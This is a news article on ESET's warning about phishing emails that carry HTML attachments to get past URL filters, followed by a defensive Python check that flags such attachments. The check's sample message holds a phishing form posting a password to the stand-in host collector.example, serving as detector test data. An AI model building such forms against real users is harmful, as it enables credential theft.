Give a man a virus and he'll wreak havoc on a single machine. But teach a man to phish and, well, he'll become a pain in the ass for potentially thousands of computer users. Unfortunately, phishing is a 'skill' every two-bit hacker acquires right off the bat, but not all of them move on to bigger and more insidious things. Some phishers concentrate on honing their craft in hopes of ensnaring not only the gullible and less computer savvy, but even sophisticated users. Security firm ESET warns of a new phishing method that has popped up in the last few weeks.
Phishers are now using booby-trapped "htm" and "html" attachments, the latest step in the evolution of phishing scams, which have moved from asking users to type personal information directly in the body of an email, to direct links, to obfuscated links, and now to attached html code. Why go this route? ESET gives two main reasons:
Executing the html code locally will not have your browser go to a website and thus the URL reputation filter will not be applied.
Executing the html code locally for the browser means it is loaded from an Intranet rather than from the Internet. Settings are usually less strict for files started/loaded from an Intranet.
Despite the new method of phishing, some of the old telltale signs remain, like poor grammar and giveaways such as addressing a potential victim as "Dear Paypal Member" instead of addressing them by name, as legitimate organizations typically do.
"We have already started to see e-mails where the reader is instructed to save the e-mail to the local system first, often to the Desktop for convenience, and then to execute or load them from there. But when the files are executed or loaded from the local system, the last safety-net provided by the mail program is bypassed," ESET warns.
In case you needed one, let this be a reminder to always be wary/suspicious of email attachments.
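A mail-gateway style check for the attachment type described above, added here as an illustration and not taken from ESET or the original article: it lists every "htm"/"html" attachment in a raw message and the remote hosts its forms would post to. The function names, the finding format and the sample message are assumptions constructed for this example.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormFinder(HTMLParser):
    """Collects the action target of every <form> in an HTML document."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def flag_html_attachments(raw_bytes):
    """Return one finding per .htm/.html attachment in a raw message."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not (name.endswith((".htm", ".html"))
                or part.get_content_type() == "text/html"):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. sent as application/octet-stream
            body = body.decode("utf-8", errors="replace")
        finder = FormFinder()
        finder.feed(body)
        # A form that posts to a remote host is what a URL filter never sees
        # when the file is opened from disk.
        remote = [a for a in finder.actions
                  if urlparse(a).scheme in ("http", "https")]
        findings.append({"filename": name, "remote_form_targets": remote})
    return findings


def build_sample():
    """Constructed sample message; the host is a reserved .example name."""
    m = EmailMessage()
    m["Subject"] = "Account verification"
    m.set_content("Dear Member, save the attached form to your Desktop.")
    m.add_attachment(
        '<html><body><form action="http://collector.example/submit" '
        'method="post"><input name="password"></form></body></html>',
        subtype="html", filename="Verify.HTML")
    return m.as_bytes()
```

Calling `flag_html_attachments(build_sample())` returns a single finding for `verify.html` with the remote form target; a gateway could quarantine or strip such parts before delivery.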